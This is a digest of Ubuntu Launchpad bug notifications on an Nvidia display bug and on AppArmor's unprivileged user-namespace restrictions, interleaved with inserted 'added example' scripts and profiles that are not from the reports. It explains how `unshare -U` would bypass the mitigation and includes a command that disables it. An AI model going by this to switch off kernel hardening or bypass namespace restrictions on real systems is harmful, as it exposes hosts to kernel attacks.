** Information type changed from Private Security to Public

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to xorg in Ubuntu.
https://bugs.launchpad.net/bugs/2039589

Title: Nvidia driver Ubuntu bug

Status in xorg package in Ubuntu: New

Bug description:
Nvidia driver error 470: UFW main window not displayed properly and Help not displayed. The issue affects Ubuntu 22.04.3 LTS, Ubuntu 23.10 and Linux Mint.

ProblemType: Bug
DistroRelease: Ubuntu 22.04
Package: xorg 1:7.7+23ubuntu2
ProcVersionSignature: Ubuntu 6.2.0-34.34~22.04.1-generic 6.2.16
Uname: Linux 6.2.0-34-generic x86_64
NonfreeKernelModules: nvidia_modeset nvidia
.proc.driver.nvidia.capabilities.gpu0: Error: path was not a regular file.
.proc.driver.nvidia.capabilities.mig: Error: path was not a regular file.
.proc.driver.nvidia.gpus..01.00.0: Error: path was not a regular file.
.proc.driver.nvidia.registry: Binary: ""
.proc.driver.nvidia.suspend: suspend hibernate resume
.proc.driver.nvidia.suspend_depth: default modeset uvm
.proc.driver.nvidia.version:
 NVRM version: NVIDIA UNIX x86_64 Kernel Module  470.199.02  Thu May 11 11:46:56 UTC 2023
 GCC version:
ApportVersion: 2.20.11-0ubuntu82.5
Architecture: amd64
BootLog: Error: [Errno 13] Permission denied: '/var/log/boot.log'
CasperMD5CheckResult: pass
CompositorRunning: None
CurrentDesktop: ubuntu:GNOME
Date: Tue Oct 17 18:13:32 2023
DistUpgraded: Fresh install
DistroCodename: jammy
DistroVariant: ubuntu
GraphicsCard:
 NVIDIA Corporation GK107 [GeForce GTX 650] [10de:0fc6] (rev a1) (prog-if 00 [VGA controller])
   Subsystem: CardExpert Technology GK107 [GeForce GTX 650] [10b0:0fc6]
InstallationDate: Installed on 2023-10-16 (1 days ago)
InstallationMedia: Ubuntu 22.04.3 LTS "Jammy Jellyfish" - Release amd64 (20230807.2)
MachineType: Gigabyte Technology Co., Ltd. To be filled by O.E.M.
ProcEnviron:
 PATH=(custom, no user)
 XDG_RUNTIME_DIR=
 LANG=pl_PL.UTF-8
 SHELL=/bin/bash
ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-6.2.0-34-generic root=UUID=7faab2db-29fa-4024-ae67-d6f019c15904 ro quiet splash vt.handoff=7
SourcePackage: xorg
Symptom: display
UpgradeStatus: No upgrade log present (probably fresh install)
dmi.bios.date: 02/25/2014
dmi.bios.release: 4.6
dmi.bios.vendor: American Megatrends Inc.
dmi.bios.version: 10b
dmi.board.asset.tag: To be filled by O.E.M.
dmi.board.name: H61M-S1
dmi.board.vendor: Gigabyte Technology Co., Ltd.
dmi.board.version: x.x
dmi.chassis.asset.tag: To Be Filled By O.E.M.
dmi.chassis.type: 3
dmi.chassis.vendor: Gigabyte Technology Co., Ltd.
dmi.chassis.version: To Be Filled By O.E.M.
dmi.modalias: dmi:bvnAmericanMegatrendsInc.:bvr10b:bd02/25/2014:br4.6:svnGigabyteTechnologyCo.,Ltd.:pnTobefilledbyO.E.M.:pvrTobefilledbyO.E.M.:rvnGigabyteTechnologyCo.,Ltd.:rnH61M-S1:rvrx.x:cvnGigabyteTechnologyCo.,Ltd.:ct3:cvrToBeFilledByO.E.M.:skuTobefilledbyO.E.M.:
dmi.product.family: To be filled by O.E.M.
dmi.product.name: To be filled by O.E.M.
dmi.product.sku: To be filled by O.E.M.
dmi.product.version: To be filled by O.E.M.
dmi.sys.vendor: Gigabyte Technology Co., Ltd.
version.compiz: compiz N/A
version.libdrm2: libdrm2 2.4.113-2~ubuntu0.22.04.1
version.libgl1-mesa-dri: libgl1-mesa-dri 23.0.4-0ubuntu1~22.04.1
version.libgl1-mesa-glx: libgl1-mesa-glx N/A
version.nvidia-graphics-drivers: nvidia-graphics-drivers-* N/A
version.xserver-xorg-core: xserver-xorg-core 2:21.1.4-2ubuntu1.7~22.04.1
version.xserver-xorg-input-evdev: xserver-xorg-input-evdev N/A
version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:19.1.0-2ubuntu1
version.xserver-xorg-video-intel: xserver-xorg-video-intel 2:2.99.917+git20210115-1
version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:1.0.17-2build1

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/xorg/+bug/2039589/+subscriptions
[Touch-packages] [Bug 2036128] Re: [FFe] enable unprivileged user namespace restrictions by default for mantic
As discussed with the wider security team, we have decided not to push ahead with this change for mantic and instead will look to enable it very early in the 24.04 devel cycle. Marking as invalid and unsubscribing the release team.

** Changed in: apparmor (Ubuntu)
       Status: New => Won't Fix

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/2036128

Title: [FFe] enable unprivileged user namespace restrictions by default for mantic

Status in apparmor package in Ubuntu: Won't Fix

Bug description:
As per https://discourse.ubuntu.com/t/spec-unprivileged-user-namespace-restrictions-via-apparmor-in-ubuntu-23-10/37626, unprivileged user namespace restrictions for Ubuntu 23.10 are to be enabled by default via a sysctl.d conf file in apparmor.

In https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2035315 new apparmor profiles were added to the apparmor package for various applications which require unprivileged user namespaces, using a new unconfined profile mode. To support this an additional change was added to the mantic kernel in https://git.launchpad.net/~ubuntu-kernel/ubuntu/+source/linux/+git/mantic/commit?h=master-next&id=7327726a2dbf571e05f7c095916dcce0347790b4 which is still currently unreleased. Without this kernel change, if userns restrictions are enabled the existing policies added above will not actually work to allow them to be used by the various applications.

As such we need to ensure that userns restrictions are not enabled via sysctl when this feature is not present / enabled. Whilst it may be possible to capture the dependency logic via `Breaks:` or similar, this would not help in the case that a user booted into an older kernel with the new apparmor userspace package.

As such, as well as enabling the sysctl via the sysctl.d conf file, it is proposed to add logic into the apparmor.service systemd unit to check that the kernel supports the aforementioned unconfined profile mode and that it is enabled - and if not then to force disable the userns restrictions sysctl via the following logic:

    userns_restricted=$(sysctl -n kernel.apparmor_restrict_unprivileged_userns)
    unconfined_userns=$([ -f /sys/kernel/security/apparmor/features/policy/unconfined_restrictions/userns ] && cat /sys/kernel/security/apparmor/features/policy/unconfined_restrictions/userns || echo 0)
    if [ -n "$userns_restricted" ] && [ "$userns_restricted" -eq 1 ]; then
        if [ "$unconfined_userns" -eq 0 ]; then
            # userns restrictions rely on unconfined userns to be supported
            echo "disabling unprivileged userns restrictions since unconfined userns is not supported / enabled"
            sysctl -w kernel.apparmor_restrict_unprivileged_userns=0
        fi
    fi

This allows a local admin to disable the sysctl via the regular sysctl.d conf approach, but also makes sure we don't inadvertently enable it when it is not supported by the kernel.

This proposed change has been tested via the QA Regression Testing project, in particular with the specific test added in https://git.launchpad.net/qa-regression-testing/commit/?id=6f2c5ab7c8659174adac772ce0e894328bb5045d

This produces the following output, confirming the fallback works as expected on the current mantic kernel (which does not fully support the userns restrictions):

---
Running test: './test-apparmor.py' distro: 'Ubuntu 23.10' kernel: '6.5.0-5.5 (Ubuntu 6.5.0-5.5-generic 6.5.0)' arch: 'amd64' init: 'systemd' uid: 0/0 SUDO_USER: 'ubuntu')
test_unconfined_userns (__main__.ApparmorTest.test_unconfined_userns)
Test that unconfined userns restrictions are applied ... Skipping private tests
WARN: kernel rate limiting in effect
Disabling ratelimiting until the next reboot.
To re-enable, run:
# sysctl -w kernel.printk_ratelimit=5
(enabling userns restrictions)
(restarting apparmor)
(checking userns restrictions got disabled)
ok

--
Ran 1 test in 0.232s

OK
---

Also we can see on a fresh boot with this new version installed that apparmor.service shows it has disabled the sysctl before loading any profiles even though the conf file has it enabled - and finally we can see that unshare -U works as expected:

root@sec-mantic-amd64:~# uptime
 07:04:48 up 0 min,  0 user,  load average: 0.00, 0.00, 0.00
root@sec-mantic-amd64:~# journalctl -b0 --unit apparmor.service --no-pager
Sep 15 07:04:47 sec-mantic-amd64 systemd[1]: Starting apparmor.service - Load AppArmor profiles...
Sep 15 07:04:47 sec-mantic-amd64 apparmor.systemd[308]: Restarting AppArmor
Sep 15 07:04:47 sec-mantic-amd64 apparmor.systemd[308]: disabling unprivileged userns restrictions since unconfined userns is not supported / enabled
Sep 15 07:04:47 sec-mantic-amd64 apparmor.systemd[320]: kernel.apparmor_restrict_unprivileged_userns = 0
Sep 15 07:04:47
[Touch-packages] [Bug 2036698] Re: Unprivileged user namespace restrictions break various third-party applications
** Changed in: apparmor (Ubuntu)
     Assignee: (unassigned) => Alex Murray (alexmurray)

** Changed in: apparmor (Ubuntu)
   Importance: Undecided => High

** Changed in: apparmor (Ubuntu)
       Status: New => Confirmed
[Touch-packages] [Bug 2036698] [NEW] Unprivileged user namespace restrictions break various third-party applications
Public bug reported:

Similar to https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2035315 the proposed unprivileged user namespace restrictions feature of apparmor in mantic breaks various third-party applications that use unprivileged userns for sandboxing themselves. These include:

- Brave
- Microsoft Edge
- Opera
- Visual Studio Code
- Vivaldi

apparmor in mantic should ship skeleton profiles for each of these to ensure they work as expected if a user has them installed.

** Affects: apparmor (Ubuntu)
     Importance: Undecided
         Status: New

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/2036698

Title: Unprivileged user namespace restrictions break various third-party applications

Status in apparmor package in Ubuntu: New

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2036698/+subscriptions
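The shape of the skeleton profile the report asks for, as an added illustration rather than a file taken from the apparmor package: the profile uses the unconfined profile mode discussed in bug 2035315, so the application is not otherwise confined, but it now carries a name and an explicit `userns` rule, which is what lets its sandbox keep creating user namespaces once `kernel.apparmor_restrict_unprivileged_userns=1` denies that to unprofiled programs. The binary path below is an assumption for illustration; confirm the real path on the target system (for example with `dpkg -L brave-browser` or `readlink -f "$(command -v brave-browser)"`) before installing the file under /etc/apparmor.d/ and loading it with `sudo apparmor_parser -r /etc/apparmor.d/brave`.

```apparmor
# /etc/apparmor.d/brave  (added example; the binary path is an assumption)
# This profile allows everything and only exists to give the application a
# name and the userns permission instead of the label "unconfined".
abi <abi/4.0>,
include <tunables/global>

profile brave /opt/brave.com/brave/brave flags=(unconfined) {
  userns,

  # Site-specific additions and overrides. See local/README for details.
  include if exists <local/brave>
}
```

After loading, `aa-status` should list the profile in unconfined mode; with the sysctl at 1 the browser's sandbox launches normally, while an unprofiled `unshare -U true` is still denied, which is the check that confirms the restriction is actually in force.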
[Touch-packages] [Bug 2036128] Re: [FFe] enable unprivileged user namespace restrictions by default for mantic
** Changed in: apparmor (Ubuntu)
       Status: Incomplete => New
[Touch-packages] [Bug 2036128] Re: [FFe] enable unprivileged user namespace restrictions by default for mantic
@vorlon - the FFe you approved was to upload a whole new release apparmor-4.0.0~alpha2 with supporting infrastructure for this feature, but crucially it did not enable it at that time (as we wanted more time to add additional profiles for all the packages in the archive so that when the feature gets turned on they would work as before). This new FFe does enable it *and* also adds some logic so that we only enable it when the kernel supports all the required features. This is to ensure that during an upgrade from lunar -> mantic, or when booting an older kernel which doesn't have all the features, we don't enable the sysctl and break applications which expect to be able to use userns.

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/2036128

Title:
  [FFe] enable unprivileged user namespace restrictions by default for mantic

Status in apparmor package in Ubuntu:
  Incomplete

Bug description:
  As per https://discourse.ubuntu.com/t/spec-unprivileged-user-namespace-restrictions-via-apparmor-in-ubuntu-23-10/37626, unprivileged user namespace restrictions for Ubuntu 23.10 are to be enabled by default via a sysctl.d conf file in apparmor.

  In https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2035315 new apparmor profiles were added to the apparmor package for various applications which require unprivileged user namespaces, using a new unconfined profile mode. To support this an additional change was added to the mantic kernel in https://git.launchpad.net/~ubuntu-kernel/ubuntu/+source/linux/+git/mantic/commit?h=master-next=7327726a2dbf571e05f7c095916dcce0347790b4 which is still currently unreleased. Without this kernel change, if userns restrictions are enabled the existing policies added above will not actually work to allow them to be used by the various applications.

  As such we need to ensure that userns restrictions are not enabled via sysctl when this feature is not present / enabled. Whilst it may be possible to capture the dependency logic via `Breaks:` or similar, this would not help in the case that a user booted into an older kernel with the new apparmor userspace package.

  As such, as well as enabling the sysctl via the sysctl.d conf file, it is proposed to add logic into the apparmor.service systemd unit to check that the kernel supports the aforementioned unconfined profile mode and that it is enabled - and if not then to force disable the userns restrictions sysctl via the following logic:

    userns_restricted=$(sysctl -n kernel.apparmor_restrict_unprivileged_userns)
    unconfined_userns=$([ -f /sys/kernel/security/apparmor/features/policy/unconfined_restrictions/userns ] && cat /sys/kernel/security/apparmor/features/policy/unconfined_restrictions/userns || echo 0)
    if [ -n "$userns_restricted" ] && [ "$userns_restricted" -eq 1 ]; then
      if [ "$unconfined_userns" -eq 0 ]; then
        # userns restrictions rely on unconfined userns to be supported
        echo "disabling unprivileged userns restrictions since unconfined userns is not supported / enabled"
        sysctl -w kernel.apparmor_restrict_unprivileged_userns=0
      fi
    fi

  this allows a local admin to disable the sysctl via the regular sysctl.d conf approach, but to also make sure we don't inadvertently enable it when it is not supported by the kernel.

  This proposed change has been tested via the QA Regression Testing project, in particular with the specific test added in https://git.launchpad.net/qa-regression-testing/commit/?id=6f2c5ab7c8659174adac772ce0e894328bb5045d

  This produces the following output, confirming the fallback works as expected on the current mantic kernel (which does not fully support the userns restrictions):

  ---

  Running test: './test-apparmor.py' distro: 'Ubuntu 23.10' kernel: '6.5.0-5.5 (Ubuntu 6.5.0-5.5-generic 6.5.0)' arch: 'amd64' init: 'systemd' uid: 0/0 SUDO_USER: 'ubuntu')
  test_unconfined_userns (__main__.ApparmorTest.test_unconfined_userns)
  Test that unconfined userns restrictions are applied ... Skipping private tests

  WARN: kernel rate limiting in effect
  Disabling ratelimiting until the next reboot. To renable, run:
  # sysctl -w kernel.printk_ratelimit=5

  (enabling userns restrictions) (restarting apparmor) (checking userns restrictions got disabled) ok

  --
  Ran 1 test in 0.232s

  OK

  ---

  Also we can see on a fresh-boot with this new version installed that apparmor.service shows it has disabled the sysctl before loading any profiles even though the conf file has it enabled - and finally we can see that unshare -U works as expected:
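The fallback logic in the bug description above, reworked as an added example (this is not the bug report's or the apparmor package's own code): the decision is pulled into a pure function over its two inputs so it can be dry-run and exercised on a machine that has neither the sysctl nor the securityfs feature file. The function names, the --dry-run flag, the "keep/disable/off" vocabulary and the userns-fallback.sh file name are this example's assumptions; the sysctl key and features path are the ones from the report.

```shell
#!/bin/sh
# Added example, not code from the bug report: a dry-run capable version of the
# apparmor.service fallback check. apparmor.service reads the live sysctl and the
# AppArmor features file under securityfs; here both reads are separate helpers
# so the decision itself can be tested with constructed inputs.

SYSCTL_KEY=kernel.apparmor_restrict_unprivileged_userns
FEATURE_FILE=/sys/kernel/security/apparmor/features/policy/unconfined_restrictions/userns

# read_sysctl_value KEY -> prints the value, or nothing when the sysctl does not
# exist (an older kernel without the AppArmor userns sysctl). stderr is silenced
# so a missing key does not put an error in the journal on every boot.
read_sysctl_value() {
    sysctl -n "$1" 2>/dev/null
}

# read_feature_flag FILE -> the file contents, or 0 when the file is absent;
# this is the $([ -f ... ] && cat ... || echo 0) idiom from the report.
read_feature_flag() {
    if [ -f "$1" ]; then cat "$1"; else echo 0; fi
}

# userns_fallback_decision RESTRICTED UNCONFINED_USERNS -> prints one of:
#   disable  sysctl is 1 but the kernel lacks unconfined userns: write it back to 0
#   keep     sysctl is 1 and the kernel supports it: restrictions stay enabled
#   off      sysctl is 0, absent or non-numeric: nothing to do
# As in the unit logic, an empty or non-numeric feature value is not treated as
# 0, so the restrictions stay on (the check fails closed, not open).
userns_fallback_decision() {
    restricted=$1
    unconfined=$2
    if [ -n "$restricted" ] && [ "$restricted" -eq 1 ] 2>/dev/null; then
        if [ "$unconfined" -eq 0 ] 2>/dev/null; then
            echo disable
        else
            echo keep
        fi
    else
        echo off
    fi
}

# apply_userns_fallback [--dry-run] -> reads the live inputs, reports the
# decision and, unless --dry-run is given, applies it exactly as the unit would
# before any profile is loaded.
apply_userns_fallback() {
    restricted=$(read_sysctl_value "$SYSCTL_KEY")
    unconfined=$(read_feature_flag "$FEATURE_FILE")
    decision=$(userns_fallback_decision "$restricted" "$unconfined")
    echo "$SYSCTL_KEY=${restricted:-<absent>} unconfined_userns=$unconfined decision=$decision"
    if [ "$decision" = disable ] && [ "${1:-}" != --dry-run ]; then
        echo "disabling unprivileged userns restrictions since unconfined userns is not supported / enabled"
        sysctl -w "$SYSCTL_KEY=0"
    fi
}

# Only act when run as userns-fallback.sh; sourcing the file just defines the functions.
case "${0##*/}" in
    userns-fallback.sh) apply_userns_fallback "${1:-}" ;;
esac
```

Run as `sh userns-fallback.sh --dry-run` on a mantic host to see which branch the unit would take for the running kernel without changing anything; a "disable" on a kernel that is supposed to have the feature means the securityfs file is missing, which is worth checking before assuming the sysctl.d setting took effect.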
[Touch-packages] [Bug 2036128] Re: [FFe] enable unprivileged user namespace restrictions by default for mantic
FYI I redid this change again on top of the fix from https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/2036302 and have uploaded it to the aforementioned PPA (debdiff is almost identical, except for the different context in debian/changelog)

** Patch added: "apparmor_4.0.0~alpha2-0ubuntu5.debdiff"
   https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2036128/+attachment/5701789/+files/apparmor_4.0.0~alpha2-0ubuntu5.debdiff

--
https://bugs.launchpad.net/bugs/2036128

Title:
  [FFe] enable unprivileged user namespace restrictions by default for mantic

Status in apparmor package in Ubuntu:
  New
[Touch-packages] [Bug 2035315] Re: Unprivileged user namespace restrictions break various applications
As seen in https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2036302 it turns out the lxc package already shipped a profile in /etc/apparmor.d/usr.bin.lxc-create - so this profile itself needs to be updated to add the userns permission and declare the new ABI in lxc in mantic.

** Also affects: lxc (Ubuntu)
   Importance: Undecided
       Status: New

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/2035315

Title:
  Unprivileged user namespace restrictions break various applications

Status in apparmor package in Ubuntu:
  Fix Released
Status in lxc package in Ubuntu:
  New

Bug description:
  When the unprivileged user namespace restrictions are enabled, various applications within and outside the Ubuntu archive fail to function, as they use unprivileged user namespaces as part of their normal operation.

  A search of the Ubuntu archive for the 23.10 release was performed looking for all applications that make legitimate use of the CLONE_NEWUSER argument, the details of which can be seen in https://docs.google.com/spreadsheets/d/1MOPVoTW0BROF1TxYqoWeJ3c6w2xKElI4w-VjdCG0m9s/edit#gid=2102562502

  For each package identified in that list, an investigation was made to determine if the application actually used this as an unprivileged user, and if so which of the binaries within the package were affected. The full investigation can be seen in https://warthogs.atlassian.net/browse/SEC-1898 (which is unfortunately private) but is summarised to the following list of Ubuntu source packages, with the affected binaries as noted. NOTE that due to time constraints for some packages it was not possible to finish the complete investigation and so for those *all* the binaries from the package are listed below.

  For each of these binaries, an apparmor profile is required so that the binary can be granted use of unprivileged user namespaces - an example profile for the ch-run binary within the charliecloud package is shown:

  $ cat /etc/apparmor.d/usr.bin.ch-run
  abi ,

  include

  /usr/bin/ch-run flags=(unconfined) {
    userns,

    # Site-specific additions and overrides. See local/README for details.
    include if exists
  }

  However, in a few select cases, it has been decided not to ship an apparmor profile, since this would effectively allow this mitigation to be bypassed. In particular, the unshare and setns binaries within the util-linux package are installed on every Ubuntu system, and allow an unprivileged user the ability to launch an arbitrary application within a new user namespace. Any malicious application then that wished to exploit an unprivileged user namespace to conduct an attack on the kernel would simply need to spawn itself via `unshare -U` or similar to be granted this permission. Therefore, due to the ubiquitous nature of the unshare (and setns) binaries, profiles are not planned to be provided for these by default. Similarly, the bwrap binary within bubblewrap is also installed by default on Ubuntu Desktop 23.10 and can also be used to launch arbitrary binaries within a new user namespace and so no profile is planned to be provided for this either.

  Those packages for which either a profile is not required or which a profile is not planned are listed below, whilst the list of packages that require a profile (and their associated binaries) is listed at the end:

  Packages that use user namespaces but for which a profile is not required or not planned:

  - bubblewrap
    - /usr/bin/bwrap (NOT PLANNED AS NOTED ABOVE)
  - cifs-utils
    - /usr/sbin/cifs.upcall (NOT REQUIRED AS IS EXECUTED AS root)
  - consfigurator # NOT REQUIRED, NO BINARIES OR reverse-depends
  - criu
    - /usr/sbin/criu (NOT REQUIRED SINCE ONLY FUNCTIONS AS root)
  - docker.io-app
    - /usr/bin/dockerd (NOT REQUIRED SINCE RUNS AS root)
  - firejail
    - /usr/bin/firejail (NOT REQUIRED SINCE is suid root)
  - golang-github-containers-storage
    - /usr/bin/containers-storage (NOT REQUIRED SINCE ONLY FUNCTIONS AS root)
  - golang-gvisor-gvisor
    - /usr/bin/runsc (NOT REQUIRED SINCE ONLY FUNCTIONS AS root)
  - guix
    - /usr/bin/guix-daemon (NOT REQUIRED SINCE RUNS AS root)
  - libvdestack # NOT REQUIRED, NO BINARIES OR reverse-depends
  - libvirt # NOT REQUIRED SINCE USES lxc WHICH WILL HAVE A PROFILE
  - network-manager # NOT REQUIRED SINCE CODE IS UNUSED
  - nix # APPEARS UNNEEDED IN DEFAULT CONFIGURATION
  - ocaml-extunix # NO BINARIES OR reverse-depends
  - passt
    - /usr/bin/passt # IS EXPECTED TO BE EXECUTED AS root
  - rust-rustix # NO BINARIES AND CODE IS UNUSED IN THE ARCHIVE
  - util-linux -

  Packages that use unprivileged user namespaces which require a profile (or already have one as part of the previous apparmor update in 4.0.0~alpha2-0ubuntu1
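An added example (not the bug report's or the apparmor package's own code) of turning the per-binary profile shape shown above into a small generator, with the report's reasoning about unshare, setns and bwrap encoded as a refusal list so a packaging script cannot hand the userns permission to a generic namespace launcher by accident. The `abi <abi/4.0>`, `include <tunables/global>` and `include <local/...>` targets are this example's assumption about the stock Ubuntu profile layout (the excerpt in the report lost its bracketed targets in extraction); the function names are this example's own.

```shell
#!/bin/sh
# Added example, not code from the bug report: render an AppArmor "unconfined"
# profile that grants one binary the userns permission, following the ch-run
# profile in the report, and refuse for the launchers the report leaves unprofiled.

# Binaries that let any unprivileged program re-exec itself inside a new user
# namespace; profiling them would bypass the mitigation (see the report above).
BYPASS_BINARIES="/usr/bin/unshare /usr/bin/setns /usr/bin/bwrap"

# profile_name_for PATH -> conventional /etc/apparmor.d file name:
# drop the leading slash, turn the remaining slashes into dots
# (/usr/bin/ch-run -> usr.bin.ch-run).
profile_name_for() {
    printf '%s\n' "${1#/}" | tr '/' '.'
}

# is_bypass_binary PATH -> exit 0 when PATH is one of the launchers above.
is_bypass_binary() {
    for b in $BYPASS_BINARIES; do
        [ "$1" = "$b" ] && return 0
    done
    return 1
}

# render_userns_profile PATH -> prints the profile text on stdout.
# Exit 1 for a relative path, exit 2 (and no output) for a bypass binary.
render_userns_profile() {
    bin=$1
    case "$bin" in
        /*) ;;
        *) echo "error: absolute path required: $bin" >&2; return 1 ;;
    esac
    if is_bypass_binary "$bin"; then
        echo "refusing: $bin launches arbitrary programs in a new userns" >&2
        return 2
    fi
    name=$(profile_name_for "$bin")
    # abi/4.0 and tunables/global are assumed from the Ubuntu profile layout.
    cat <<EOF
abi <abi/4.0>,

include <tunables/global>

$bin flags=(unconfined) {
  userns,

  # Site-specific additions and overrides. See local/README for details.
  include if exists <local/$name>
}
EOF
}

# install_userns_profile PATH [DIR] -> writes the profile under DIR (default
# /etc/apparmor.d), syntax-checks it with apparmor_parser -Q when that tool is
# present, and prints the file written. Loading it (apparmor_parser -r FILE)
# is left to the caller so the check can run in a build chroot.
install_userns_profile() {
    bin=$1
    dir=${2:-/etc/apparmor.d}
    out="$dir/$(profile_name_for "$bin")"
    render_userns_profile "$bin" > "$out" || { rm -f "$out"; return 1; }
    if command -v apparmor_parser >/dev/null 2>&1; then
        apparmor_parser -Q "$out" || return 1
    fi
    printf '%s\n' "$out"
}
```

The refusal list is deliberately a short, explicit set rather than a heuristic: the property that matters (the binary will exec whatever an unprivileged caller names, inside the namespace it just created) is not something a generator can detect from the path, so new entries have to come from the kind of per-package review the report describes.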
[Touch-packages] [Bug 2036302] Re: apparmor 4.0.0~alpha2-0ubuntu3 ships same file as liblxc-common
Uploaded in apparmor 4.0.0~alpha2-0ubuntu4 - currently waiting to build etc - https://launchpad.net/ubuntu/mantic/+queue?queue_state=3_text=apparmor

** Changed in: apparmor (Ubuntu)
       Status: Triaged => Fix Committed

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/2036302

Title:
  apparmor 4.0.0~alpha2-0ubuntu3 ships same file as liblxc-common

Status in apparmor package in Ubuntu:
  Fix Committed
Status in lxc package in Ubuntu:
  Triaged

Bug description:
  When running apt-get dist-upgrade I saw this message:

  Preparing to unpack .../apparmor_4.0.0~alpha2-0ubuntu3_amd64.deb ...
  Unpacking apparmor (4.0.0~alpha2-0ubuntu3) over (4.0.0~alpha2-0ubuntu2) ...
  dpkg: error processing archive /var/cache/apt/archives/apparmor_4.0.0~alpha2-0ubuntu3_amd64.deb (--unpack):
   trying to overwrite '/etc/apparmor.d/usr.bin.lxc-start', which is also in package liblxc-common 1:5.0.1-0ubuntu6
  dpkg-deb: error: paste subprocess was killed by signal (Broken pipe)

  The problem could be overcome with:

  sudo apt-get install liblxc-common --reinstall

  which resulted in output

  Preparing to unpack .../liblxc-common_1%3a5.0.1-0ubuntu6_amd64.deb ...
  Unpacking liblxc-common (1:5.0.1-0ubuntu6) over (1:5.0.1-0ubuntu6) ...

  I have seen the same type of problem before with other packages. I would have expected apt-get to correctly sequence all necessary actions on its own.

  These are related events in my apt history:

  Start-Date: 2022-10-30 05:33:09
  Commandline: apt-get install lxc
  Requested-By: ubuntu (1000)
  Install: liblxc-common:amd64 (1:5.0.0~git2209-g5a7b9ce67-0ubuntu3, automatic)

  Start-Date: 2023-01-28 11:06:34
  Commandline: apt-get dist-upgrade
  Requested-By: ubuntu (1000)
  Upgrade: liblxc-common:amd64 (1:5.0.0~git2209-g5a7b9ce67-0ubuntu3, 1:5.0.1-0ubuntu6)

  ProblemType: Bug
  DistroRelease: Ubuntu 23.10
  Package: apt 2.7.3
  ProcVersionSignature: Ubuntu 6.5.0-5.5-generic 6.5.0
  Uname: Linux 6.5.0-5-generic x86_64
  NonfreeKernelModules: zfs
  ApportVersion: 2.27.0-0ubuntu2
  Architecture: amd64
  CasperMD5CheckResult: pass
  CurrentDesktop: KDE
  Date: Sat Sep 16 11:12:36 2023
  InstallationDate: Installed on 2021-07-01 (807 days ago)
  InstallationMedia: Kubuntu 21.04 "Hirsute Hippo" - Release amd64 (20210420)
  SourcePackage: apt
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2036302/+subscriptions

--
Mailing list: https://launchpad.net/~touch-packages
Post to     : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2036302] Re: apparmor 4.0.0~alpha2-0ubuntu3 ships same file as liblxc-common
Apologies for this - I am working on an update now to resolve it.

--
https://bugs.launchpad.net/bugs/2036302

Title:
  apparmor 4.0.0~alpha2-0ubuntu3 ships same file as liblxc-common

Status in apparmor package in Ubuntu:
  Triaged
Status in lxc package in Ubuntu:
  Triaged
[Touch-packages] [Bug 2036128] Re: [FFe] enable unprivileged user namespace restrictions by default for mantic
@sil2100 - apologies, I think I wasn't clear - for the actual enablement to take effect, this FFe does require the new kernel - BUT I added some fallback logic to detect if the kernel doesn't support the required feature so that the sysctl gets disabled in that case when the apparmor service is starting but before it has loaded any profiles. As such, we can safely land this FFe before the kernel lands.

--
https://bugs.launchpad.net/bugs/2036128

Title:
  [FFe] enable unprivileged user namespace restrictions by default for mantic

Status in apparmor package in Ubuntu:
  New
[Touch-packages] [Bug 2036128] Re: [FFe] enable unprivileged user namespace restrictions by default for mantic
I have uploaded this new version to https://launchpad.net/~alexmurray/+archive/ubuntu/lp2036128 and so it should be built soon (from which the build log will be available). Please let me know if any other information is required.

--
https://bugs.launchpad.net/bugs/2036128

Title:
  [FFe] enable unprivileged user namespace restrictions by default for mantic

Status in apparmor package in Ubuntu:
  New
[Touch-packages] [Bug 2036128] Re: [FFe] enable unprivileged user namespace restrictions by default for mantic
apt log when installing new apparmor packages ** Description changed: As per https://discourse.ubuntu.com/t/spec-unprivileged-user-namespace- restrictions-via-apparmor-in-ubuntu-23-10/37626, unprivileged user namespace restrictions for Ubuntu 23.10 are to be enabled by default via a sysctl.d conf file in apparmor. In https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2035315 new apparmor profiles were added to the apparmor package for various applications which require unprivileged user namespaces, using a new unconfined profile mode. To support this an additional change was added to the mantic kernel in https://git.launchpad.net/~ubuntu- kernel/ubuntu/+source/linux/+git/mantic/commit?h=master- next=7327726a2dbf571e05f7c095916dcce0347790b4 which is still currently unreleased. Without this kernel change, if userns restrictions are enabled the existing policies added above will not actually work to allow them to be used by the various applications. As such we need to ensure that userns restrictions are not enabled via sysctl when this feature is not present / enabled. Whilst it may be possible to capture the dependency logic via `Breaks:` or similar, this would not help in the case that a user booted into an older kernel with the new apparmor userspace package. 
